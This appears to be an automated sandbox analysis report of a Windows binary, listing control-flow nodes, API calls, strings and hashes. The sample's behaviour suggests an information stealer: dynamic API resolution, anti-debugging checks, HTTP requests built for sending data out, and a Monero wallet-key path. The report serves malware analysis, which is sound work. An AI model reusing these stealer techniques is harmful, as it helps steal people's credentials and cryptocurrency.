5f15d9 14377->14378 14379 60a7a0 lstrcpy 14378->14379 14380 5f1663 14379->14380 14381 605510 14380->14381 14382 605521 14381->14382 14383 60a820 2 API calls 14382->14383 14384 60552e 14383->14384 14385 60a820 2 API calls 14384->14385 14386 60553b 14385->14386 14387 60a820 2 API calls 14386->14387 14388 605548 14387->14388 14389 60a740 lstrcpy 14388->14389 14390 605555 14389->14390 14391 60a740 lstrcpy 14390->14391 14392 605562 14391->14392 14393 60a740 lstrcpy 14392->14393 14394 60556f 14393->14394 14395 60a740 lstrcpy 14394->14395 14434 60557c 14395->14434 14396 5f1590 lstrcpy 14396->14434 14397 605643 StrCmpCA 14397->14434 14398 6056a0 StrCmpCA 14399 6057dc 14398->14399 14398->14434 14400 60a8a0 lstrcpy 14399->14400 14401 6057e8 14400->14401 14402 60a820 2 API calls 14401->14402 14404 6057f6 14402->14404 14403 60a820 lstrlen lstrcpy 14403->14434 14406 60a820 2 API calls 14404->14406 14405 605856 StrCmpCA 14407 605991 14405->14407 14405->14434 14409 605805 14406->14409 14408 60a8a0 lstrcpy 14407->14408 14410 60599d 14408->14410 14411 5f1670 lstrcpy 14409->14411 14412 60a820 2 API calls 14410->14412 14432 605811 14411->14432 14413 6059ab 14412->14413 14415 60a820 2 API calls 14413->14415 14414 605a0b StrCmpCA 14416 605a16 Sleep 14414->14416 14417 605a28 14414->14417 14419 6059ba 14415->14419 14416->14434 14420 60a8a0 lstrcpy 14417->14420 14418 60a740 lstrcpy 14418->14434 14421 5f1670 lstrcpy 14419->14421 14422 605a34 14420->14422 14421->14432 14423 60a820 2 API calls 14422->14423 14424 605a43 14423->14424 14427 60a820 2 API calls 14424->14427 14425 6052c0 25 API calls 14425->14434 14426 6051f0 20 API calls 14426->14434 14429 605a52 14427->14429 14428 60578a StrCmpCA 14428->14434 14430 5f1670 lstrcpy 14429->14430 14430->14432 14431 60593f StrCmpCA 14431->14434 14432->13488 14433 60a7a0 lstrcpy 14433->14434 14434->14396 14434->14397 14434->14398 14434->14403 14434->14405 14434->14414 14434->14418 14434->14425 14434->14426 14434->14428 14434->14431 14434->14433 14435 
60a8a0 lstrcpy 14434->14435 14435->14434 14437 607553 GetVolumeInformationA 14436->14437 14438 60754c 14436->14438 14439 607591 14437->14439 14438->14437 14440 6075fc GetProcessHeap RtlAllocateHeap 14439->14440 14441 607628 wsprintfA 14440->14441 14442 607619 14440->14442 14444 60a740 lstrcpy 14441->14444 14443 60a740 lstrcpy 14442->14443 14445 605da7 14443->14445 14444->14445 14445->13509 14447 60a7a0 lstrcpy 14446->14447 14448 5f4899 14447->14448 15500 5f47b0 14448->15500 14450 5f48a5 14451 60a740 lstrcpy 14450->14451 14452 5f48d7 14451->14452 14453 60a740 lstrcpy 14452->14453 14454 5f48e4 14453->14454 14455 60a740 lstrcpy 14454->14455 14456 5f48f1 14455->14456 14457 60a740 lstrcpy 14456->14457 14458 5f48fe 14457->14458 14459 60a740 lstrcpy 14458->14459 14460 5f490b InternetOpenA StrCmpCA 14459->14460 14461 5f4944 14460->14461 14462 5f4ecb InternetCloseHandle 14461->14462 15506 608b60 14461->15506 14463 5f4ee8 14462->14463 15521 5f9ac0 CryptStringToBinaryA 14463->15521 14465 5f4963 15514 60a920 14465->15514 14468 5f4976 14470 60a8a0 lstrcpy 14468->14470 14475 5f497f 14470->14475 14471 60a820 2 API calls 14472 5f4f05 14471->14472 14474 60a9b0 4 API calls 14472->14474 14473 5f4f27 codecvt 14477 60a7a0 lstrcpy 14473->14477 14476 5f4f1b 14474->14476 14479 60a9b0 4 API calls 14475->14479 14478 60a8a0 lstrcpy 14476->14478 14490 5f4f57 14477->14490 14478->14473 14480 5f49a9 14479->14480 14481 60a8a0 lstrcpy 14480->14481 14482 5f49b2 14481->14482 14483 60a9b0 4 API calls 14482->14483 14484 5f49d1 14483->14484 14485 60a8a0 lstrcpy 14484->14485 14486 5f49da 14485->14486 14487 60a920 3 API calls 14486->14487 14488 5f49f8 14487->14488 14489 60a8a0 lstrcpy 14488->14489 14491 5f4a01 14489->14491 14490->13512 14492 60a9b0 4 API calls 14491->14492 14493 5f4a20 14492->14493 14494 60a8a0 lstrcpy 14493->14494 14495 5f4a29 14494->14495 14496 60a9b0 4 API calls 14495->14496 14497 5f4a48 14496->14497 14498 60a8a0 lstrcpy 14497->14498 14499 5f4a51 14498->14499 14500 60a9b0 4 API calls 
14499->14500 14501 5f4a7d 14500->14501 14502 60a920 3 API calls 14501->14502 14503 5f4a84 14502->14503 14504 60a8a0 lstrcpy 14503->14504 14505 5f4a8d 14504->14505 14506 5f4aa3 InternetConnectA 14505->14506 14506->14462 14507 5f4ad3 HttpOpenRequestA 14506->14507 14509 5f4ebe InternetCloseHandle 14507->14509 14510 5f4b28 14507->14510 14509->14462 14511 60a9b0 4 API calls 14510->14511 14512 5f4b3c 14511->14512 14513 60a8a0 lstrcpy 14512->14513 14514 5f4b45 14513->14514 14515 60a920 3 API calls 14514->14515 14516 5f4b63 14515->14516 14517 60a8a0 lstrcpy 14516->14517 14518 5f4b6c 14517->14518 14519 60a9b0 4 API calls 14518->14519 14520 5f4b8b 14519->14520 14521 60a8a0 lstrcpy 14520->14521 14522 5f4b94 14521->14522 14523 60a9b0 4 API calls 14522->14523 14524 5f4bb5 14523->14524 14525 60a8a0 lstrcpy 14524->14525 14526 5f4bbe 14525->14526 14527 60a9b0 4 API calls 14526->14527 14528 5f4bde 14527->14528 14529 60a8a0 lstrcpy 14528->14529 14530 5f4be7 14529->14530 14531 60a9b0 4 API calls 14530->14531 14532 5f4c06 14531->14532 14533 60a8a0 lstrcpy 14532->14533 14534 5f4c0f 14533->14534 14535 60a920 3 API calls 14534->14535 14536 5f4c2d 14535->14536 14537 60a8a0 lstrcpy 14536->14537 14538 5f4c36 14537->14538 14539 60a9b0 4 API calls 14538->14539 14540 5f4c55 14539->14540 14541 60a8a0 lstrcpy 14540->14541 14542 5f4c5e 14541->14542 14543 60a9b0 4 API calls 14542->14543 14544 5f4c7d 14543->14544 14545 60a8a0 lstrcpy 14544->14545 14546 5f4c86 14545->14546 14547 60a920 3 API calls 14546->14547 14548 5f4ca4 14547->14548 14549 60a8a0 lstrcpy 14548->14549 14550 5f4cad 14549->14550 14551 60a9b0 4 API calls 14550->14551 14552 5f4ccc 14551->14552 14553 60a8a0 lstrcpy 14552->14553 14554 5f4cd5 14553->14554 14555 60a9b0 4 API calls 14554->14555 14556 5f4cf6 14555->14556 14557 60a8a0 lstrcpy 14556->14557 14558 5f4cff 14557->14558 14559 60a9b0 4 API calls 14558->14559 14560 5f4d1f 14559->14560 14561 60a8a0 lstrcpy 14560->14561 14562 5f4d28 14561->14562 14563 60a9b0 4 API calls 14562->14563 
14564 5f4d47 14563->14564 14565 60a8a0 lstrcpy 14564->14565 14566 5f4d50 14565->14566 14567 60a920 3 API calls 14566->14567 14568 5f4d6e 14567->14568 14569 60a8a0 lstrcpy 14568->14569 14570 5f4d77 14569->14570 14571 60a740 lstrcpy 14570->14571 14572 5f4d92 14571->14572 14573 60a920 3 API calls 14572->14573 14574 5f4db3 14573->14574 14575 60a920 3 API calls 14574->14575 14576 5f4dba 14575->14576 14577 60a8a0 lstrcpy 14576->14577 14578 5f4dc6 14577->14578 14579 5f4de7 lstrlen 14578->14579 14580 5f4dfa 14579->14580 14581 5f4e03 lstrlen 14580->14581 15520 60aad0 14581->15520 14583 5f4e13 HttpSendRequestA 14584 5f4e32 InternetReadFile 14583->14584 14585 5f4e67 InternetCloseHandle 14584->14585 14590 5f4e5e 14584->14590 14588 60a800 14585->14588 14587 60a9b0 4 API calls 14587->14590 14588->14509 14589 60a8a0 lstrcpy 14589->14590 14590->14584 14590->14585 14590->14587 14590->14589 15527 60aad0 14591->15527 14593 6017c4 StrCmpCA 14594 6017cf ExitProcess 14593->14594 14605 6017d7 14593->14605 14595 6019c2 14595->13514 14596 6018ad StrCmpCA 14596->14605 14597 6018cf StrCmpCA 14597->14605 14598 601970 StrCmpCA 14598->14605 14599 6018f1 StrCmpCA 14599->14605 14600 601951 StrCmpCA 14600->14605 14601 601932 StrCmpCA 14601->14605 14602 601913 StrCmpCA 14602->14605 14603 60185d StrCmpCA 14603->14605 14604 60187f StrCmpCA 14604->14605 14605->14595 14605->14596 14605->14597 14605->14598 14605->14599 14605->14600 14605->14601 14605->14602 14605->14603 14605->14604 14606 60a820 lstrlen lstrcpy 14605->14606 14606->14605 14608 60a7a0 lstrcpy 14607->14608 14609 5f5979 14608->14609 14610 5f47b0 2 API calls 14609->14610 14611 5f5985 14610->14611 14612 60a740 lstrcpy 14611->14612 14613 5f59ba 14612->14613 14614 60a740 lstrcpy 14613->14614 14615 5f59c7 14614->14615 14616 60a740 lstrcpy 14615->14616 14617 5f59d4 14616->14617 14618 60a740 lstrcpy 14617->14618 14619 5f59e1 14618->14619 14620 60a740 lstrcpy 14619->14620 14621 5f59ee InternetOpenA StrCmpCA 14620->14621 14622 5f5a1d 14621->14622 
14623 5f5fc3 InternetCloseHandle 14622->14623 14624 608b60 3 API calls 14622->14624 14625 5f5fe0 14623->14625 14626 5f5a3c 14624->14626 14628 5f9ac0 4 API calls 14625->14628 14627 60a920 3 API calls 14626->14627 14629 5f5a4f 14627->14629 14630 5f5fe6 14628->14630 14631 60a8a0 lstrcpy 14629->14631 14632 60a820 2 API calls 14630->14632 14635 5f601f codecvt 14630->14635 14637 5f5a58 14631->14637 14633 5f5ffd 14632->14633 14634 60a9b0 4 API calls 14633->14634 14636 5f6013 14634->14636 14639 60a7a0 lstrcpy 14635->14639 14638 60a8a0 lstrcpy 14636->14638 14640 60a9b0 4 API calls 14637->14640 14638->14635 14648 5f604f 14639->14648 14641 5f5a82 14640->14641 14642 60a8a0 lstrcpy 14641->14642 14643 5f5a8b 14642->14643 14644 60a9b0 4 API calls 14643->14644 14645 5f5aaa 14644->14645 14646 60a8a0 lstrcpy 14645->14646 14647 5f5ab3 14646->14647 14649 60a920 3 API calls 14647->14649 14648->13520 14650 5f5ad1 14649->14650 14651 60a8a0 lstrcpy 14650->14651 14652 5f5ada 14651->14652 14653 60a9b0 4 API calls 14652->14653 14654 5f5af9 14653->14654 14655 60a8a0 lstrcpy 14654->14655 14656 5f5b02 14655->14656 14657 60a9b0 4 API calls 14656->14657 14658 5f5b21 14657->14658 14659 60a8a0 lstrcpy 14658->14659 14660 5f5b2a 14659->14660 14661 60a9b0 4 API calls 14660->14661 14662 5f5b56 14661->14662 14663 60a920 3 API calls 14662->14663 14664 5f5b5d 14663->14664 14665 60a8a0 lstrcpy 14664->14665 14666 5f5b66 14665->14666 14667 5f5b7c InternetConnectA 14666->14667 14667->14623 14668 5f5bac HttpOpenRequestA 14667->14668 14670 5f5c0b 14668->14670 14671 5f5fb6 InternetCloseHandle 14668->14671 14672 60a9b0 4 API calls 14670->14672 14671->14623 14673 5f5c1f 14672->14673 14674 60a8a0 lstrcpy 14673->14674 14675 5f5c28 14674->14675 14676 60a920 3 API calls 14675->14676 14677 5f5c46 14676->14677 14678 60a8a0 lstrcpy 14677->14678 14679 5f5c4f 14678->14679 14680 60a9b0 4 API calls 14679->14680 14681 5f5c6e 14680->14681 14682 60a8a0 lstrcpy 14681->14682 14683 5f5c77 14682->14683 14684 60a9b0 4 API calls 
14683->14684 14685 5f5c98 14684->14685 14686 60a8a0 lstrcpy 14685->14686 14687 5f5ca1 14686->14687 14688 60a9b0 4 API calls 14687->14688 14689 5f5cc1 14688->14689 14690 60a8a0 lstrcpy 14689->14690 14691 5f5cca 14690->14691 14692 60a9b0 4 API calls 14691->14692 14693 5f5ce9 14692->14693 14694 60a8a0 lstrcpy 14693->14694 14695 5f5cf2 14694->14695 14696 60a920 3 API calls 14695->14696 14697 5f5d10 14696->14697 14698 60a8a0 lstrcpy 14697->14698 14699 5f5d19 14698->14699 14700 60a9b0 4 API calls 14699->14700 14701 5f5d38 14700->14701 14702 60a8a0 lstrcpy 14701->14702 14703 5f5d41 14702->14703 14704 60a9b0 4 API calls 14703->14704 14705 5f5d60 14704->14705 14706 60a8a0 lstrcpy 14705->14706 14707 5f5d69 14706->14707 14708 60a920 3 API calls 14707->14708 14709 5f5d87 14708->14709 14710 60a8a0 lstrcpy 14709->14710 14711 5f5d90 14710->14711 14712 60a9b0 4 API calls 14711->14712 14713 5f5daf 14712->14713 14714 60a8a0 lstrcpy 14713->14714 14715 5f5db8 14714->14715 14716 60a9b0 4 API calls 14715->14716 14717 5f5dd9 14716->14717 14718 60a8a0 lstrcpy 14717->14718 14719 5f5de2 14718->14719 14720 60a9b0 4 API calls 14719->14720 14721 5f5e02 14720->14721 14722 60a8a0 lstrcpy 14721->14722 14723 5f5e0b 14722->14723 14724 60a9b0 4 API calls 14723->14724 14725 5f5e2a 14724->14725 14726 60a8a0 lstrcpy 14725->14726 14727 5f5e33 14726->14727 14728 60a920 3 API calls 14727->14728 14729 5f5e54 14728->14729 14730 60a8a0 lstrcpy 14729->14730 14731 5f5e5d 14730->14731 14732 5f5e70 lstrlen 14731->14732 15528 60aad0 14732->15528 14734 5f5e81 lstrlen GetProcessHeap RtlAllocateHeap 15529 60aad0 14734->15529 14736 5f5eae lstrlen 14737 5f5ebe 14736->14737 14738 5f5ed7 lstrlen 14737->14738 14739 5f5ee7 14738->14739 14740 5f5ef0 lstrlen 14739->14740 14741 5f5f04 14740->14741 14742 5f5f1a lstrlen 14741->14742 15530 60aad0 14742->15530 14744 5f5f2a HttpSendRequestA 14745 5f5f35 InternetReadFile 14744->14745 14746 5f5f6a InternetCloseHandle 14745->14746 14750 5f5f61 14745->14750 14746->14671 14748 60a9b0 
4 API calls 14748->14750 14749 60a8a0 lstrcpy 14749->14750 14750->14745 14750->14746 14750->14748 14750->14749 14753 601077 14751->14753 14752 601151 14752->13522 14753->14752 14754 60a820 lstrlen lstrcpy 14753->14754 14754->14753 14756 600db7 14755->14756 14757 600f17 14756->14757 14758 600ea4 StrCmpCA 14756->14758 14759 600e27 StrCmpCA 14756->14759 14760 600e67 StrCmpCA 14756->14760 14761 60a820 lstrlen lstrcpy 14756->14761 14757->13530 14758->14756 14759->14756 14760->14756 14761->14756 14765 600f67 14762->14765 14763 601044 14763->13538 14764 600fb2 StrCmpCA 14764->14765 14765->14763 14765->14764 14766 60a820 lstrlen lstrcpy 14765->14766 14766->14765 14768 60a740 lstrcpy 14767->14768 14769 601a26 14768->14769 14770 60a9b0 4 API calls 14769->14770 14771 601a37 14770->14771 14772 60a8a0 lstrcpy 14771->14772 14773 601a40 14772->14773 14774 60a9b0 4 API calls 14773->14774 14775 601a5b 14774->14775 14776 60a8a0 lstrcpy 14775->14776 14777 601a64 14776->14777 14778 60a9b0 4 API calls 14777->14778 14779 601a7d 14778->14779 14780 60a8a0 lstrcpy 14779->14780 14781 601a86 14780->14781 14782 60a9b0 4 API calls 14781->14782 14783 601aa1 14782->14783 14784 60a8a0 lstrcpy 14783->14784 14785 601aaa 14784->14785 14786 60a9b0 4 API calls 14785->14786 14787 601ac3 14786->14787 14788 60a8a0 lstrcpy 14787->14788 14789 601acc 14788->14789 14790 60a9b0 4 API calls 14789->14790 14791 601ae7 14790->14791 14792 60a8a0 lstrcpy 14791->14792 14793 601af0 14792->14793 14794 60a9b0 4 API calls 14793->14794 14795 601b09 14794->14795 14796 60a8a0 lstrcpy 14795->14796 14797 601b12 14796->14797 14798 60a9b0 4 API calls 14797->14798 14799 601b2d 14798->14799 14800 60a8a0 lstrcpy 14799->14800 14801 601b36 14800->14801 14802 60a9b0 4 API calls 14801->14802 14803 601b4f 14802->14803 14804 60a8a0 lstrcpy 14803->14804 14805 601b58 14804->14805 14806 60a9b0 4 API calls 14805->14806 14807 601b76 14806->14807 14808 60a8a0 lstrcpy 14807->14808 14809 601b7f 14808->14809 14810 607500 6 API calls 
14809->14810 14811 601b96 14810->14811 14812 60a920 3 API calls 14811->14812 14813 601ba9 14812->14813 14814 60a8a0 lstrcpy 14813->14814 14815 601bb2 14814->14815 14816 60a9b0 4 API calls 14815->14816 14817 601bdc 14816->14817 14818 60a8a0 lstrcpy 14817->14818 14819 601be5 14818->14819 14820 60a9b0 4 API calls 14819->14820 14821 601c05 14820->14821 14822 60a8a0 lstrcpy 14821->14822 14823 601c0e 14822->14823 15531 607690 GetProcessHeap RtlAllocateHeap 14823->15531 14826 60a9b0 4 API calls 14827 601c2e 14826->14827 14828 60a8a0 lstrcpy 14827->14828 14829 601c37 14828->14829 14830 60a9b0 4 API calls 14829->14830 14831 601c56 14830->14831 14832 60a8a0 lstrcpy 14831->14832 14833 601c5f 14832->14833 14834 60a9b0 4 API calls 14833->14834 14835 601c80 14834->14835 14836 60a8a0 lstrcpy 14835->14836 14837 601c89 14836->14837 15538 6077c0 GetCurrentProcess IsWow64Process 14837->15538 14840 60a9b0 4 API calls 14841 601ca9 14840->14841 14842 60a8a0 lstrcpy 14841->14842 14843 601cb2 14842->14843 14844 60a9b0 4 API calls 14843->14844 14845 601cd1 14844->14845 14846 60a8a0 lstrcpy 14845->14846 14847 601cda 14846->14847 14848 60a9b0 4 API calls 14847->14848 14849 601cfb 14848->14849 14850 60a8a0 lstrcpy 14849->14850 14851 601d04 14850->14851 14852 607850 3 API calls 14851->14852 14853 601d14 14852->14853 14854 60a9b0 4 API calls 14853->14854 14855 601d24 14854->14855 14856 60a8a0 lstrcpy 14855->14856 14857 601d2d 14856->14857 14858 60a9b0 4 API calls 14857->14858 14859 601d4c 14858->14859 14860 60a8a0 lstrcpy 14859->14860 14861 601d55 14860->14861 14862 60a9b0 4 API calls 14861->14862 14863 601d75 14862->14863 14864 60a8a0 lstrcpy 14863->14864 14865 601d7e 14864->14865 14866 6078e0 3 API calls 14865->14866 14867 601d8e 14866->14867 14868 60a9b0 4 API calls 14867->14868 14869 601d9e 14868->14869 14870 60a8a0 lstrcpy 14869->14870 14871 601da7 14870->14871 14872 60a9b0 4 API calls 14871->14872 14873 601dc6 14872->14873 14874 60a8a0 lstrcpy 14873->14874 14875 601dcf 14874->14875 14876 

                            Control-flow Graph (interactive graph omitted; basic blocks 609860-609bc2: call 609750, call 609780 with GetProcAddress * 21, LoadLibraryA * 5, then further GetProcAddress calls)
                            APIs
                            • GetProcAddress.KERNEL32(75900000,01400618), ref: 006098A1
                            • GetProcAddress.KERNEL32(75900000,01400720), ref: 006098BA
                            • GetProcAddress.KERNEL32(75900000,014005A0), ref: 006098D2
                            • GetProcAddress.KERNEL32(75900000,014005B8), ref: 006098EA
                            • GetProcAddress.KERNEL32(75900000,014007F8), ref: 00609903
                            • GetProcAddress.KERNEL32(75900000,01408890), ref: 0060991B
                            • GetProcAddress.KERNEL32(75900000,013F6480), ref: 00609933
                            • GetProcAddress.KERNEL32(75900000,013F65E0), ref: 0060994C
                            • GetProcAddress.KERNEL32(75900000,014007B0), ref: 00609964
                            • GetProcAddress.KERNEL32(75900000,014007E0), ref: 0060997C
                            • GetProcAddress.KERNEL32(75900000,01400810), ref: 00609995
                            • GetProcAddress.KERNEL32(75900000,01400708), ref: 006099AD
                            • GetProcAddress.KERNEL32(75900000,013F6440), ref: 006099C5
                            • GetProcAddress.KERNEL32(75900000,01400840), ref: 006099DE
                            • GetProcAddress.KERNEL32(75900000,014005D0), ref: 006099F6
                            • GetProcAddress.KERNEL32(75900000,013F6340), ref: 00609A0E
                            • GetProcAddress.KERNEL32(75900000,014006A8), ref: 00609A27
                            • GetProcAddress.KERNEL32(75900000,01400738), ref: 00609A3F
                            • GetProcAddress.KERNEL32(75900000,013F6640), ref: 00609A57
                            • GetProcAddress.KERNEL32(75900000,014005E8), ref: 00609A70
                            • GetProcAddress.KERNEL32(75900000,013F6600), ref: 00609A88
                            • LoadLibraryA.KERNEL32(01400558,?,00606A00), ref: 00609A9A
                            • LoadLibraryA.KERNEL32(01400750,?,00606A00), ref: 00609AAB
                            • LoadLibraryA.KERNEL32(01400768,?,00606A00), ref: 00609ABD
                            • LoadLibraryA.KERNEL32(01400798,?,00606A00), ref: 00609ACF
                            • LoadLibraryA.KERNEL32(01400648,?,00606A00), ref: 00609AE0
                            • GetProcAddress.KERNEL32(75070000,014007C8), ref: 00609B02
                            • GetProcAddress.KERNEL32(75FD0000,01400660), ref: 00609B23
                            • GetProcAddress.KERNEL32(75FD0000,01408D18), ref: 00609B3B
                            • GetProcAddress.KERNEL32(75A50000,01408CB8), ref: 00609B5D
                            • GetProcAddress.KERNEL32(74E50000,013F6620), ref: 00609B7E
                            • GetProcAddress.KERNEL32(76E80000,01408840), ref: 00609B9F
                            • GetProcAddress.KERNEL32(76E80000,NtQueryInformationProcess), ref: 00609BB6
                            Strings
                            • NtQueryInformationProcess, xrefs: 00609BAA
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$LibraryLoad
                            • String ID: NtQueryInformationProcess
                            • API String ID: 2238633743-2781105232
                            • Opcode ID: b27ba0f696ca45886f47da74c02f0f918353664233011eb6d95b5498fdbd0a32
                            • Instruction ID: 60061440064d6688a3bbbc853cd8b1495f243b4b36bdf8ecb36d902b9d65bfd1
                            • Opcode Fuzzy Hash: b27ba0f696ca45886f47da74c02f0f918353664233011eb6d95b5498fdbd0a32
                            • Instruction Fuzzy Hash: F7A12AB55052449FD34CEFA8ED88A663BF9F7EC3017048D2AA6C5C3264D7799841CB62

                            Control-flow Graph (interactive graph omitted; basic blocks 5f45c0-5f47a9: RtlAllocateHeap, a loop over 5f46a0-5f474a, then VirtualProtect)
                            APIs
                            • RtlAllocateHeap.NTDLL(00000000), ref: 005F460E
                            • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 005F479C
                            Strings
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005F46CD, 005F46B7, 005F474F, 005F4657, 005F4713, 005F473F, 005F4662, 005F4643, 005F45C7, 005F4638, 005F4729, 005F4678, 005F4770, 005F45E8, 005F46C2, 005F477B, 005F471E, 005F4617, 005F45F3, 005F46D8, 005F4734, 005F45DD, 005F466D, 005F4765, 005F4622, 005F475A, 005F4683, 005F45D2, 005F46AC, 005F462D
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateHeapProtectVirtual
                            • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom. (the same string repeated, $-separated)
                            • API String ID: 1542196881-2218711628
                            • Opcode ID: 01d0ad24207df5b7d7e8686b845ff8d39fc11457372f01986f9b0a8d160b17cd
                            • Instruction ID: 98bed77e327668300d07cb023fe5365cba173c78b0bfecc35ddd8c00aa511d4b
                            • Opcode Fuzzy Hash: 01d0ad24207df5b7d7e8686b845ff8d39fc11457372f01986f9b0a8d160b17cd
                            • Instruction Fuzzy Hash: 0A4178657C2604FFE664B7A5A84EDDDB663DF8E700F897140FA015A2C2CFB867A04D21

                            Control-flow Graph (function starting at 5f4880; graph rendering not available in this text export, legend: Executed / Not Executed)
                            APIs
                              • Part of subcall function 0060A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0060A7E6
                              • Part of subcall function 005F47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 005F4839
                              • Part of subcall function 005F47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 005F4849
                              • Part of subcall function 0060A740: lstrcpy.KERNEL32(00610E17,00000000), ref: 0060A788
                            • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 005F4915
                            • StrCmpCA.SHLWAPI(?,0140E430), ref: 005F493A
                            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 005F4ABA
                            • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00610DDB,00000000,?,?,00000000,?,",00000000,?,0140E4C0), ref: 005F4DE8
                            • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 005F4E04
                            • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 005F4E18
                            • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 005F4E49
                            • InternetCloseHandle.WININET(00000000), ref: 005F4EAD
                            • InternetCloseHandle.WININET(00000000), ref: 005F4EC5
                            • HttpOpenRequestA.WININET(00000000,0140E490,?,0140DB30,00000000,00000000,00400100,00000000), ref: 005F4B15
                              • Part of subcall function 0060A9B0: lstrlen.KERNEL32(?,01408AA0,?,\Monero\wallet.keys,00610E17), ref: 0060A9C5
                              • Part of subcall function 0060A9B0: lstrcpy.KERNEL32(00000000), ref: 0060AA04
                              • Part of subcall function 0060A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0060AA12
                              • Part of subcall function 0060A8A0: lstrcpy.KERNEL32(?,00610E17), ref: 0060A905
                              • Part of subcall function 0060A920: lstrcpy.KERNEL32(00000000,?), ref: 0060A972
                              • Part of subcall function 0060A920: lstrcat.KERNEL32(00000000), ref: 0060A982
                            • InternetCloseHandle.WININET(00000000), ref: 005F4ECF
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmp
